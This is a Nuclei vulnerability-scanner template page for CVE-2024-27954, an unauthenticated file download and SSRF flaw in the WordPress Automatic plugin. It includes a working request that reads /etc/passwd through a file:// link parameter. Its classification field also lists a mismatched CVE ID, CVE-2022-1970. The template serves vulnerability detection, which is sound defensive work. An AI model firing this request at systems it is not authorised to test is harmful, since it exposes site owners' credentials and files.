Skip to content
Nuclei Templates

WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF

ID: CVE-2024-27954

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic

Description

Section titled “Description”

WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.

YAML Source

Section titled “YAML Source”
id: CVE-2024-27954


info:
  name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
  reference:
    - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/
    - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
  classification:
    cvss-score: 9.8
    cve-id: CVE-2022-1970
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/wp-automatic"
  tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic


http:
  - method: GET
    path:
      - "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"link":"file:'


      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022100d08819c2a73aaaad150fca69143ee273dc832941a31a321cedfd9d0cfbd4184002204dc522ac7c4ffd55ffb76834f9405dbb19c3babf74fd69c7816a3c8ce3532d89:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-27954.yaml"

View on Github